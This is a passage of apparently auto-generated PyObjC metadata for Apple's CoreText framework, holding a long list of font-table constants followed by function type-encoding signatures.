SpacingType@25$kKanaToRomanizationSelector@4$kKatakanaToHiraganaSelector@3$kLCARCtlPointFormat@1$kLCARCurrentVersion@65536$kLCARLinearFormat@0$kLCARTag@1818452338$kLTAGCurrentVersion@1$kLanguageTagType@39$kLastFeatureType@-1$kLetterCaseType@3$kLigaturesType@1$kLineFinalS
washesOffSelector@7$kLineFinalSwashesOnSelector@6$kLineInitialSwashesOffSelector@5$kLineInitialSwashesOnSelector@4$kLinguisticRearrangementOffSelector@1$kLinguisticRearrangementOnSelector@0$kLinguisticRearrangementType@5$kLogosOffSelector@7$kLogosOnSelector@6$kLowerCaseNumbersSelector@0$kLowerCasePetiteCapsSelector@2$kLowerCaseSmallCapsSelector@1$kLowerCaseType@37$kMORTContextualType@1$kMORTCoverDescending@16384$kMORTCoverIgnoreVertical@8192$kMORTCoverTypeMask@15$kMORTCoverVertical@32768$kMORTCurrInsertBefore@2048$kMORTCurrInsertCountMask@992$kMORTCurrInsertCountShift@5$kMORTCurrInsertKashidaLike@8192$kMORTCurrJustTableCountMask@127$kMORTCurrJustTableCountShift@0$kMORTCurrentVersion@65536$kMORTDoInsertionsBefore@128$kMORTInsertionType@5$kMORTInsertionsCountMask@63$kMORTIsSplitVowelPiece@64$kMORTLigFormOffsetMask@1073741823$kMORTLigFormOffsetShift@2$kMORTLigLastAction@-2147483648$kMORTLigStoreLigature@1073741824$kMORTLigatureType@2$kMORTMarkInsertBefore@1024$kMORTMarkInsertCountMask@31$kMORTMarkInsertCountShift@0$kMORTMarkInsertKashidaLike@4096$kMORTMarkJustTableCountMask@16256$kMORTMarkJustTableCountShift@7$kMORTRearrangementType@0$kMORTSwashType@4$kMORTTag@1836020340$kMORTraCDx@6$kMORTraCDxA@8$kMORTraCDxAB@12$kMORTraCDxBA@13$kMORTraDCx@7$kMORTraDCxA@9$kMORTraDCxAB@14$kMORTraDCxBA@15$kMORTraDx@2$kMORTraDxA@3$kMORTraDxAB@10$kMORTraDxBA@11$kMORTraNoAction@0$kMORTraxA@1$kMORTraxAB@4$kMORTraxBA@5$kMORXCoverDescending@1073741824$kMORXCoverIgnoreVertical@536870912$kMORXCoverLogicalOrder@268435456$kMORXCoverTypeMask@255$kMORXCoverVertical@-2147483648$kMORXCurrentVersion@131072$kMORXTag@1836020344$kMathSymbolsSelector@6$kMathematicalExtrasType@15$kMathematicalGreekOffSelector@11$kMathematicalGreekOnSelector@10$kMonospacedNumbersSelector@0$kMonospacedTextSelector@1$kNLCCharactersSelector@13$kNoAlternatesSelector@0$kNoAnnotationSelector@0$kNoCJKItalicRomanSelector@0$kNoCJKSymbolAlternativesSelector@0$kNoFractionsSelector@0$kNoIdeographicAlternativesSelector@0$kNoOrnamentsSelector@0$kNoRubyKanaSelector@0$kNoStyleOptionsSelector@0$kNoStylisticAlternatesSelector@0$kNoTransliterationSelector@0$kNonFinalSwashesOffSelector@9$kNonFinalSwashesOnSelector@8$kNormalPositionSelector@0$kNumberCaseType@21$kNumberSpacingType@6$kOPBDControlPointFormat@1$kOPBDCurrentVersion@65536$kOPBDDistanceFormat@0$kOPBDTag@1869636196$kOrdinalsSelector@3$kOrnamentSetsType@16$kOverlappingCharactersType@13$kPROPALDirectionClass@2$kPROPANDirectionClass@6$kPROPBNDirectionClass@19$kPROPCSDirectionClass@7$kPROPCanHangLTMask@16384$kPROPCanHangRBMask@8192$kPROPCurrentVersion@196608$kPROPDirectionMask@31$kPROPENDirectionClass@3$kPROPESDirectionClass@4$kPROPETDirectionClass@5$kPROPIsFloaterMask@32768$kPROPLDirectionClass@0$kPROPLREDirectionClass@13$kPROPLRODirectionClass@14$kPROPNSMDirectionClass@18$kPROPNumDirectionClasses@20$kPROPONDirectionClass@11$kPROPPDFDirectionClass@17$kPROPPSDirectionClass@8$kPROPPairOffsetMask@3840$kPROPPairOffsetShift@8$kPROPPairOffsetSign@7$kPROPRDirectionClass@1$kPROPRLEDirectionClass@15$kPROPRLODirectionClass@16$kPROPRightConnectMask@128$kPROPSDirectionClass@9$kPROPSENDirectionClass@12$kPROPTag@1886547824$kPROPUseRLPairMask@4096$kPROPWSDirectionClass@10$kPROPZeroReserved@96$kParenthesisAnnotationSelector@5$kPartiallyConnectedSelector@1$kPeriodAnnotationSelector@6$kPeriodsToEllipsisOffSelector@11$kPeriodsToEllipsisOnSelector@10$kPiCharactersSelector@2$kPreventOverlapOffSelector@1$kPreventOverlapOnSelector@0$kProportionalCJKRomanSelector@1$kProportionalIdeographsSelector@1$kProportionalKanaSelector@1$kProportion
alNumbersSelector@1$kProportionalTextSelector@0$kQuarterWidthNumbersSelector@3$kQuarterWidthTextSelector@4$kRareLigaturesOffSelector@5$kRareLigaturesOnSelector@4$kRebusPicturesOffSelector@9$kRebusPicturesOnSelector@8$kRequiredLigaturesOffSelector@1$kRequiredLigaturesOnSelector@0$kRomanNumeralAnnotationSelector@7$kRomanizationToHiraganaSelector@5$kRomanizationToKatakanaSelector@6$kRoundedBoxAnnotationSelector@2$kRubyKanaOffSelector@3$kRubyKanaOnSelector@2$kRubyKanaSelector@1$kRubyKanaType@28$kSFNTLookupSegmentArray@4$kSFNTLookupSegmentSingle@2$kSFNTLookupSimpleArray@0$kSFNTLookupSingleTable@6$kSFNTLookupTrimmedArray@8$kSFNTLookupVector@10$kSTClassDeletedGlyph@2$kSTClassEndOfLine@3$kSTClassEndOfText@0$kSTClassOutOfBounds@1$kSTKCrossStreamReset@8192$kSTLigActionMask@16383$kSTMarkEnd@8192$kSTNoAdvance@16384$kSTRearrVerbMask@15$kSTSetMark@32768$kSTXHasLigAction@8192$kScientificInferiorsSelector@4$kShowDiacriticsSelector@0$kSimplifiedCharactersSelector@1$kSlashToDivideOffSelector@5$kSlashToDivideOnSelector@4$kSlashedZeroOffSelector@5$kSlashedZeroOnSelector@4$kSmallCapsSelector@3$kSmartQuotesOffSelector@9$kSmartQuotesOnSelector@8$kSmartSwashType@8$kSquaredLigaturesOffSelector@13$kSquaredLigaturesOnSelector@12$kStyleOptionsType@19$kStylisticAltEightOffSelector@17$kStylisticAltEightOnSelector@16$kStylisticAltEighteenOffSelector@37$kStylisticAltEighteenOnSelector@36$kStylisticAltElevenOffSelector@23$kStylisticAltElevenOnSelector@22$kStylisticAltFifteenOffSelector@31$kStylisticAltFifteenOnSelector@30$kStylisticAltFiveOffSelector@11$kStylisticAltFiveOnSelector@10$kStylisticAltFourOffSelector@9$kStylisticAltFourOnSelector@8$kStylisticAltFourteenOffSelector@29$kStylisticAltFourteenOnSelector@28$kStylisticAltNineOffSelector@19$kStylisticAltNineOnSelector@18$kStylisticAltNineteenOffSelector@39$kStylisticAltNineteenOnSelector@38$kStylisticAltOneOffSelector@3$kStylisticAltOneOnSelector@2$kStylisticAltSevenOffSelector@15$kStylisticAltSevenOnSelector@14$kStylisticAltSeventeenOffSelector@35$kStylisticAltSeventeenOnSelector@34$kStylisticAltSixOffSelector@13$kStylisticAltSixOnSelector@12$kStylisticAltSixteenOffSelector@33$kStylisticAltSixteenOnSelector@32$kStylisticAltTenOffSelector@21$kStylisticAltTenOnSelector@20$kStylisticAltThirteenOffSelector@27$kStylisticAltThirteenOnSelector@26$kStylisticAltThreeOffSelector@7$kStylisticAltThreeOnSelector@6$kStylisticAltTwelveOffSelector@25$kStylisticAltTwelveOnSelector@24$kStylisticAltTwentyOffSelector@41$kStylisticAltTwentyOnSelector@40$kStylisticAltTwoOffSelector@5$kStylisticAltTwoOnSelector@4$kStylisticAlternativesType@35$kSubstituteVerticalFormsOffSelector@1$kSubstituteVerticalFormsOnSelector@0$kSuperiorsSelector@1$kSwashAlternatesOffSelector@3$kSwashAlternatesOnSelector@2$kSymbolLigaturesOffSelector@17$kSymbolLigaturesOnSelector@16$kTRAKCurrentVersion@65536$kTRAKTag@1953653099$kTRAKUniformFormat@0$kTallCapsSelector@5$kTextSpacingType@22$kThirdWidthNumbersSelector@2$kThirdWidthTextSelector@3$kTitlingCapsSelector@4$kTraditionalAltFiveSelector@9$kTraditionalAltFourSelector@8$kTraditionalAltOneSelector@5$kTraditionalAltThreeSelector@7$kTraditionalAltTwoSelector@6$kTraditionalCharactersSelector@0$kTraditionalNamesCharactersSelector@14$kTranscodingCompositionOffSelector@5$kTranscodingCompositionOnSelector@4$kTransliterationType@23$kTypographicExtrasType@14$kUnconnectedSelector@0$kUnicodeDecompositionType@27$kUpperAndLowerCaseSelector@0$kUpperCaseNumbersSelector@1$kUpperCasePetiteCapsSelector@2$kUpperCaseSmallCapsSelector@1$kUpperCaseType@38$kVerticalFractionsSelector@1$kVer
ticalPositionType@10$kVerticalSubstitutionType@4$kWordFinalSwashesOffSelector@3$kWordFinalSwashesOnSelector@2$kWordInitialSwashesOffSelector@1$kWordInitialSwashesOnSelector@0$nameFontTableTag@1851878757$nonGlyphID@65535$os2FontTableTag@1330851634$sizeof_sfntCMapEncoding@8$sizeof_sfntCMapExtendedSubHeader@12$sizeof_sfntCMapHeader@4$sizeof_sfntCMapSubHeader@6$sizeof_sfntDescriptorHeader@8$sizeof_sfntDirectory@12$sizeof_sfntInstance@4$sizeof_sfntNameHeader@6$sizeof_sfntNameRecord@12$sizeof_sfntVariationAxis@20$sizeof_sfntVariationHeader@16$variationFontTableTag@1719034226$''' misc.update({}) functions={'CTFontManagerCreateFontDescriptorsFromURL': (b'^{__CFArray=}^{__CFURL=}', '', {'retval': {'already_cfretained': True}}), 'CTLineCreateTruncatedLine': (b'^{__CTLine=}^{__CTLine=}dI^{__CTLine=}', '', {'retval': {'already_cfretained': True}}), 'CTLineEnumerateCaretOffsets': (b'v^{__CTLine=}@?', '', {'retval': {'type': 'v'}, 'arguments': {1: {'callable': {'retval': {'type': b'v'}, 'arguments': {0: {'type': '^v'}, 1: {'type': 'd'}, 2: {'type': 'L'}, 3: {'type': 'B'}, 4: {'type': 'o^B'}}}, 'block': {'retval': {'type': b'v'}, 'arguments': {0: {'type': b'd'}, 1: {'type': b'q'}, 2: {'type': b'B'}, 3: {'type': b'^B'}}}}}}), 'CTFramesetterCreateFrame': (sel32or64(b'^{__CTFrame=}^{__CTFramesetter=}{_CFRange=ll}^{CGPath=}^{__CFDictionary=}', b'^{__CTFrame=}^{__CTFramesetter=}{_CFRange=qq}^{CGPath=}^{__CFDictionary=}'), '', {'retval': {'already_cfretained': True}}), 'CTTypesetterSuggestClusterBreak': (sel32or64(b'l^{__CTTypesetter=}ld', b'q^{__CTTypesetter=}qd'),), 'CTFontCreateCopyWithFamily': (sel32or64(b'^{__CTFont=}^{__CTFont=}f^{CGAffineTransform=ffffff}^{__CFString=}', b'^{__CTFont=}^{__CTFont=}d^{CGAffineTransform=dddddd}^{__CFString=}'), '', {'retval': {'already_cfretained': True}}), 'CTFontGetGlyphsForCharacters': (sel32or64(b'B^{__CTFont=}^T^Sl', b'B^{__CTFont=}^T^Sq'), '', {'arguments': {1: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}, 2: {'c_array_length_in_arg': 3, 'type_modifier': 'o'}}}), 'CTLineGetPenOffsetForFlush': (sel32or64(b'd^{__CTLine=}fd', b'd^{__CTLine=}dd'),), 'CTTypesetterSuggestLineBreak': (sel32or64(b'l^{__CTTypesetter=}ld', b'q^{__CTTypesetter=}qd'),), 'CTFontCreateWithGraphicsFont': (sel32or64(b'^{__CTFont=}^{CGFont=}f^{CGAffineTransform=ffffff}^{__CTFontDescriptor=}', b'^{__CTFont=}^{CGFont=}d^{CGAffineTransform=dddddd}^{__CTFontDescriptor=}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTRunGetStringRange': (sel32or64(b'{_CFRange=ll}^{__CTRun=}', b'{_CFRange=qq}^{__CTRun=}'),), 'CTFontCreateWithQuickdrawInstance': (sel32or64(b'^{__CTFont=}*sCf', b'^{__CTFont=}*sCd'), '', {'retval': {'already_cfretained': True}}), 'CTFontManagerUnregisterFontsForURL': (b'B^{__CFURL=}I^^{__CFError=}', '', {'arguments': {2: {'already_cfretained': True, 'type_modifier': 'o', 'null_accepted': True}}}), 'CTFontManagerCreateFontRequestRunLoopSource': (sel32or64(b'^{__CFRunLoopSource=}l@?', b'^{__CFRunLoopSource=}q@?'), '', {'retval': {'already_cfretained': True}, 'arguments': {1: {'callable': {'retval': {'type': b'@'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'i'}}}}}}), 'CTFontManagerRequestFonts': (b'v^{__CFArray=}@?', '', {'arguments': {1: {'block': {'retval': {'type': b'v'}, 'arguments': {0: {'type': b'^{__CFArray=}'}}}}}}), 'CTRubyAnnotationCreateWithAttributes': (b'@LLL@@', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorMatchFontDescriptorsWithProgressHandler': (b'B^{__CFArray=}^{__CFSet=}@?',), 
'CTGlyphInfoGetGlyph': (b'S^{__CTGlyphInfo=}',), 'CTFontManagerUnregisterFontURLs': (b'v^{__CFArray=}I@?', '', {'arguments': {2: {'callable': {'retval': {'type': b'B'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'B'}}}, 'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTFontManagerCreateFontDescriptorsFromData': (b'^{__CFArray=}^{__CFData=}', '', {'retval': {'already_cfretained': True}}), 'CTRunDelegateGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontManagerRegisterFontURLs': (b'v^{__CFArray=}IB@?', '', {'arguments': {3: {'callable': {'retval': {'type': b'B'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'B'}}}, 'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTFontCopyAvailableTables': (b'^{__CFArray=}^{__CTFont=}I', '', {'retval': {'already_cfretained': True}}), 'CTFontManagerCompareFontFamilyNames': (sel32or64(b'l^{__CFString=}^{__CFString=}^v', b'q^{__CFString=}^{__CFString=}^v'),), 'CTRubyAnnotationCreate': (sel32or64(b'^{__CTRubyAnnotation=}CCf[4^{__CFString=}]', b'^{__CTRubyAnnotation=}CCd[4^{__CFString=}]'), '', {'retval': {'already_cfretained': True}, 'arguments': {3: {'type_modifier': 'n'}}}), 'CTRunGetStringIndicesPtr': (sel32or64(b'r^i^{__CTRun=}', b'r^q^{__CTRun=}'), '', {'retval': {'c_array_of_variable_length': True}}), 'CTFontGetAscent': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontManagerRegisterGraphicsFont': (b'B^{CGFont=}^^{__CFError=}', '', {'arguments': {1: {'already_cfretained': True, 'type_modifier': 'o', 'null_accepted': True}}}), 'CTFontCollectionCopyQueryDescriptors': (b'^{__CFArray=}^{__CTFontCollection=}', '', {'retval': {'already_cfretained': True}}), 'CTTypesetterCreateLine': (sel32or64(b'^{__CTLine=}^{__CTTypesetter=}{_CFRange=ll}', b'^{__CTLine=}^{__CTTypesetter=}{_CFRange=qq}'), '', {'retval': {'already_cfretained': True}}), 'CTFontManagerRegisterFontDescriptors': (b'v^{__CFArray=}IB@?', '', {'arguments': {3: {'callable': {'retval': {'type': b'B'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'B'}}}, 'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTFontGetDescent': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontCreateWithFontDescriptor': (sel32or64(b'^{__CTFont=}^{__CTFontDescriptor=}f^{CGAffineTransform=ffffff}', b'^{__CTFont=}^{__CTFontDescriptor=}d^{CGAffineTransform=dddddd}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTRunGetAttributes': (b'^{__CFDictionary=}^{__CTRun=}',), 'CTFontCopySupportedLanguages': (b'^{__CFArray=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyVariationAxes': (b'^{__CFArray=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTTextTabGetLocation': (b'd^{__CTTextTab=}',), 'CTFontCopyPostScriptName': (b'^{__CFString=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyDefaultCascadeListForLanguages': (b'^{__CFArray=}^{__CTFont=}^{__CFArray=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetVerticalTranslationsForGlyphs': (sel32or64(b'v^{__CTFont=}^S^{_NSSize=ff}l', b'v^{__CTFont=}^S^{CGSize=dd}q'), '', {'arguments': {1: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}, 2: {'c_array_length_in_arg': 3, 'type_modifier': 'o'}}}), 'CTFontGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontCollectionCreateMatchingFontDescriptorsWithOptions': 
(b'^{__CFArray=}^{__CTFontCollection=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFramesetterCreateWithAttributedString': (b'^{__CTFramesetter=}^{__CFAttributedString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCreatePathForGlyph': (sel32or64(b'^{CGPath=}^{__CTFont=}S^{CGAffineTransform=ffffff}', b'^{CGPath=}^{__CTFont=}S^{CGAffineTransform=dddddd}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTFrameDraw': (b'v^{__CTFrame=}^{CGContext=}',), 'CTFontCollectionCopyExclusionDescriptors': (b'^{__CFArray=}^{__CTFontCollection=}', '', {'retval': {'already_cfretained': True}}), 'CTRunGetBaseAdvancesAndOrigins': (b'v^{__CTRun=}{_CFRange=qq}^{CGSize=dd}^{CGPoint=dd}', '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}, 3: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontManagerGetAutoActivationSetting': (b'I^{__CFString=}',), 'CTFontGetOpticalBoundsForGlyphs': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTFont=}^S^{_NSRect={_NSPoint=ff}{_NSSize=ff}}lL', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTFont=}^S^{CGRect={CGPoint=dd}{CGSize=dd}}qQ'), '', {'arguments': {1: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}, 2: {'c_array_length_in_arg': 3, 'type_modifier': 'o'}}}), 'CTFontManagerUnregisterFontDescriptors': (b'v^{__CFArray=}I@?', '', {'arguments': {2: {'callable': {'retval': {'type': b'B'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'B'}}}, 'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTFontDescriptorCopyAttribute': (b'@^{__CTFontDescriptor=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCreateWithFontDescriptorAndOptions': (sel32or64(b'^{__CTFont=}^{__CTFontDescriptor=}f^{CGAffineTransform=ffffff}L', b'^{__CTFont=}^{__CTFontDescriptor=}d^{CGAffineTransform=dddddd}Q'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTFontGetMatrix': (sel32or64(b'{CGAffineTransform=ffffff}^{__CTFont=}', b'{CGAffineTransform=dddddd}^{__CTFont=}'),), 'CTFontGetSymbolicTraits': (b'I^{__CTFont=}',), 'CTFontCreateCopyWithAttributes': (sel32or64(b'^{__CTFont=}^{__CTFont=}f^{CGAffineTransform=ffffff}^{__CTFontDescriptor=}', b'^{__CTFont=}^{__CTFont=}d^{CGAffineTransform=dddddd}^{__CTFontDescriptor=}'), '', {'retval': {'already_cfretained': True}}), 'CTRubyAnnotationGetSizeFactor': (sel32or64(b'f^{__CTRubyAnnotation=}', b'd^{__CTRubyAnnotation=}'),), 'CTFontCollectionCopyFontAttribute': (b'^{__CFArray=}^{__CTFontCollection=}^{__CFString=}I', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyFamilyName': (b'^{__CFString=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTGlyphInfoGetTypeID': (sel32or64(b'L', b'Q'),), 'CTParagraphStyleCreate': (sel32or64(b'^{__CTParagraphStyle=}^{CTParagraphStyleSetting=II^v}L', b'^{__CTParagraphStyle=}^{CTParagraphStyleSetting=IQ^v}Q'), '', {'retval': {'already_cfretained': True}, 'arguments': {0: {'c_array_length_in_arg': 1, 'type_modifier': 'n'}}}), 'CTRunGetImageBounds': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTRun=}^{CGContext=}{_CFRange=ll}', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTRun=}^{CGContext=}{_CFRange=qq}'),), 'CTFontManagerIsSupportedFont': (b'B^{__CFURL=}',), 'CTRunGetAdvancesPtr': (sel32or64(b'^{CGSize=ff}^{__CTRun=}', b'^{CGSize=dd}^{__CTRun=}'), '', {'retval': {'c_array_of_variable_length': True}}), 'CTRunGetStatus': (b'I^{__CTRun=}',), 
'CTGlyphInfoGetCharacterIdentifier': (b'S^{__CTGlyphInfo=}',), 'CTFontGetUnitsPerEm': (b'I^{__CTFont=}',), 'CTFontCopyVariation': (b'^{__CFDictionary=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFrameGetFrameAttributes': (b'^{__CFDictionary=}^{__CTFrame=}',), 'CTFramesetterCreateWithTypesetter': (b'@@', '', {'retval': {'already_cfretained': True}}), 'CTTextTabCreate': (b'^{__CTTextTab=}Cd^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCollectionSetExclusionDescriptors': (b'v^{__CTFontCollection=}^{__CFArray=}',), 'CTFrameGetPath': (b'^{CGPath=}^{__CTFrame=}',), 'CTFontManagerCopyRegisteredFontDescriptors': (b'^{__CFArray=}IB', '', {'retval': {'already_cfretained': True}}), 'CTFrameGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFramesetterGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontCollectionCreateFromAvailableFonts': (b'^{__CTFontCollection=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTRunGetGlyphsPtr': (b'r^S^{__CTRun=}', '', {'retval': {'c_array_of_variable_length': True}}), 'CTFontDrawGlyphs': (sel32or64(b'v^{__CTFont=}^S^{CGPoint=ff}L^{CGContext=}', b'v^{__CTFont=}^S^{CGPoint=dd}Q^{CGContext=}'), '', {'arguments': {1: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}, 2: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}}}), 'CTFontGetGlyphCount': (sel32or64(b'l^{__CTFont=}', b'q^{__CTFont=}'),), 'CTFontManagerCreateFontDescriptorFromData': (b'^{__CTFontDescriptor=}^{__CFData=}', '', {'retval': {'already_cfretained': True}}), 'CTGlyphInfoGetCharacterCollection': (b'S^{__CTGlyphInfo=}',), 'CTFontCopyAttribute': (b'@^{__CTFont=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetBoundingRectsForGlyphs': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTFont=}I^S^{_NSRect={_NSPoint=ff}{_NSSize=ff}}l', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTFont=}I^S^{CGRect={CGPoint=dd}{CGSize=dd}}q'), '', {'arguments': {2: {'c_array_length_in_arg': 4, 'type_modifier': 'n'}, 3: {'c_array_length_in_arg': 4, 'type_modifier': 'o'}}}), 'CTFontGetBoundingBox': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTFont=}', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTFont=}'),), 'CTFontManagerSetAutoActivationSetting': (b'v^{__CFString=}I',), 'CTTypesetterCreateWithAttributedStringAndOptions': (b'^{__CTTypesetter=}^{__CFAttributedString=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTLineGetImageBounds': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTLine=}^{CGContext=}', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTLine=}^{CGContext=}'),), 'CTFontCopyDisplayName': (b'^{__CFString=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTGetCoreTextVersion': (b'I',), 'CTParagraphStyleCreateCopy': (b'^{__CTParagraphStyle=}^{__CTParagraphStyle=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetAdvancesForGlyphs': (sel32or64(b'd^{__CTFont=}I^S^{_NSSize=ff}l', b'd^{__CTFont=}I^S^{CGSize=dd}q'), '', {'arguments': {2: {'c_array_length_in_arg': 4, 'type_modifier': 'n'}, 3: {'c_array_length_in_arg': 4, 'type_modifier': 'o'}}}), 'CTTextTabGetOptions': (b'^{__CFDictionary=}^{__CTTextTab=}',), 'CTGlyphInfoCreateWithGlyph': (b'^{__CTGlyphInfo=}S^{__CTFont=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCreateWithPlatformFont': (sel32or64(b'^{__CTFont=}Lf^{CGAffineTransform=ffffff}^{__CTFontDescriptor=}', b'^{__CTFont=}Id^{CGAffineTransform=dddddd}^{__CTFontDescriptor=}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 
'CTFontCreateForStringWithLanguage': (b'^{__CTFont=}^{__CTFont=}^{__CFString=}{_CFRange=qq}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontManagerUnregisterGraphicsFont': (b'B^{CGFont=}^^{__CFError=}', '', {'arguments': {1: {'already_cfretained': True, 'type_modifier': 'o', 'null_accepted': True}}}), 'CTRubyAnnotationCreateCopy': (b'^{__CTRubyAnnotation=}^{__CTRubyAnnotation=}', '', {'retval': {'already_cfretained': True}}), 'CTTypesetterSuggestClusterBreakWithOffset': (sel32or64(b'l^{__CTTypesetter=}ldd', b'q^{__CTTypesetter=}qdd'),), 'CTRunGetTypeID': (sel32or64(b'L', b'Q'),), 'CTRubyAnnotationGetTextForPosition': (b'^{__CFString=}^{__CTRubyAnnotation=}C',), 'CTLineGetTypographicBounds': (sel32or64(b'd^{__CTLine=}^f^f^f', b'd^{__CTLine=}^d^d^d'), '', {'arguments': {1: {'type_modifier': 'o'}, 2: {'type_modifier': 'o'}, 3: {'type_modifier': 'o'}}}), 'CTFontGetPlatformFont': (sel32or64(b'L^{__CTFont=}^^{__CTFontDescriptor}', b'I^{__CTFont=}^^{__CTFontDescriptor}'), '', {'arguments': {1: {'already_cfretained': True, 'type_modifier': 'o'}}}), 'CTLineGetTrailingWhitespaceWidth': (b'd^{__CTLine=}',), 'CTFontManagerRegisterFontsForURL': (b'B^{__CFURL=}I^^{__CFError=}', '', {'arguments': {2: {'already_cfretained': True, 'type_modifier': 'o', 'null_accepted': True}}}), 'CTFontCopyTable': (sel32or64(b'^{__CFData=}^{__CTFont=}LI', b'^{__CFData=}^{__CTFont=}II'), '', {'retval': {'already_cfretained': True}}), 'CTTypesetterSuggestLineBreakWithOffset': (sel32or64(b'l^{__CTTypesetter=}ldd', b'q^{__CTTypesetter=}qdd'),), 'CTGlyphInfoCreateWithCharacterIdentifier': (b'^{__CTGlyphInfo=}SS^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyCharacterSet': (b'^{__CFCharacterSet=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetStringEncoding': (sel32or64(b'L^{__CTFont=}', b'I^{__CTFont=}'),), 'CTRunGetStringIndices': (sel32or64(b'v^{__CTRun=}{_CFRange=ll}^l', b'v^{__CTRun=}{_CFRange=qq}^q'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTRunGetAdvances': (sel32or64(b'v^{__CTRun=}{_CFRange=ll}^{_NSSize=ff}', b'v^{__CTRun=}{_CFRange=qq}^{CGSize=dd}'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontCollectionCreateMatchingFontDescriptorsSortedWithCallback': (b'^{__CFArray=}^{__CTFontCollection=}^?@', '', {'retval': {'already_cfretained': True}, 'arguments': {1: {'callable': {'retval': {'type': b'i'}, 'arguments': {0: {'type': b'^{__CTFontDescriptor=}'}, 1: {'type': b'^{__CTFontDescriptor=}'}, 2: {'type': b'@'}}}, 'callable_retained': False}}}), 'CTFontCopyFullName': (b'^{__CFString=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTParagraphStyleGetValueForSpecifier': (sel32or64(b'B^{__CTParagraphStyle=}IL^v', b'B^{__CTParagraphStyle=}IQ^v'), '', {'arguments': {3: {'c_array_length_in_arg': 2, 'type_modifier': 'o'}}}), 'CTLineGetOffsetForStringIndex': (sel32or64(b'f^{__CTLine=}l^f', b'd^{__CTLine=}q^d'), '', {'arguments': {2: {'type_modifier': 'o'}}}), 'CTFontManagerEnableFontDescriptors': (b'v^{__CFArray=}B',), 'CTRubyAnnotationGetAlignment': (b'C^{__CTRubyAnnotation=}',), 'CTFontCopyLocalizedName': (b'^{__CFString=}^{__CTFont=}^{__CFString=}^^{__CFString}', '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'o'}}}), 'CTFontDescriptorCreateCopyWithFamily': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontManagerGetScopeForURL': (b'I^{__CFURL=}',), 'CTFontGetSize': 
